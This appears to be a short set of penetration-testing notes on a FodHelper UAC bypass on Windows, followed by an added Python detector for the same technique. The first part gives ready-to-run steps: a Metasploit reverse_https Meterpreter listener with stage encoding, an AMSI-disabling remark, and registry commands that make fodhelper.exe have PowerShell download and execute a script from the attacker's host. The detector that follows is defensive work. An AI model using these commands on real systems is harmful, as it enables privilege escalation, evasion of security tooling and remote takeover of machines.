FodHelper UAC Bypass

Disable AMSI by setting registry key

 -o rev.ps1

Listener:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 192.168.119.120
set lport 443
set EnableStageEncoding true
set StageEncoder x64/zutto_dekiru
run

New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value "powershell.exe (New-Object System.Net.WebClient).DownloadString('http://192.168.119.120/') | IEX" -Force

New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force

C:\Windows\System32\fodhelper.exe
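
A detection-side view of the sequence above, as an added example that is not part of the original notes: it flags a user who writes both the handler's default value and DelegateExecute under the per-user ms-settings key and then starts fodhelper.exe. The events are constructed, and the field names (time, type, user, target, details, image) are assumptions loosely modelled on Sysmon-style registry and process telemetry.

```python
import re

# Per-user ms-settings handler key; matches HKCU\Software\Classes\... as well
# as loaded-hive forms such as HKU\<SID>_Classes\... (case-insensitive).
KEY_RE = re.compile(r"classes\\ms-settings\\shell\\open\\command\\(.*)$", re.I)
REQUIRED = {"(default)", "delegateexecute"}  # the two values the notes write

# Constructed sample events (hypothetical schema, not from a real host).
EVENTS = [
    {"time": "2024-01-01T10:00:00", "type": "reg_set", "user": "alice",
     "target": r"HKU\S-1-5-21-1111-1001_Classes\ms-settings\shell\open\command\(Default)",
     "details": "cmd.exe /c echo constructed-sample"},
    {"time": "2024-01-01T10:00:01", "type": "reg_set", "user": "alice",
     "target": r"HKU\S-1-5-21-1111-1001_Classes\ms-settings\shell\open\command\DelegateExecute",
     "details": "(Empty)"},
    {"time": "2024-01-01T10:00:05", "type": "proc_start", "user": "alice",
     "image": r"C:\Windows\System32\fodhelper.exe"},
    # bob opens fodhelper.exe with no handler override: expected to stay quiet
    {"time": "2024-01-01T11:00:00", "type": "proc_start", "user": "bob",
     "image": r"C:\Windows\System32\fodhelper.exe"},
]

def find_hijacks(events):
    """Alert when a user has set both handler values and then starts fodhelper.exe."""
    values = {}   # user -> {value name: data written}
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["type"] == "reg_set":
            m = KEY_RE.search(ev["target"])
            if m:
                values.setdefault(ev["user"], {})[m.group(1).lower()] = ev["details"]
        elif ev["type"] == "proc_start" and ev["image"].lower().endswith("\\fodhelper.exe"):
            seen = values.get(ev["user"], {})
            if REQUIRED.issubset(seen):
                alerts.append({"user": ev["user"], "time": ev["time"],
                               "command": seen["(default)"]})
    return alerts

if __name__ == "__main__":
    for alert in find_hijacks(EVENTS):
        print(alert)
```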
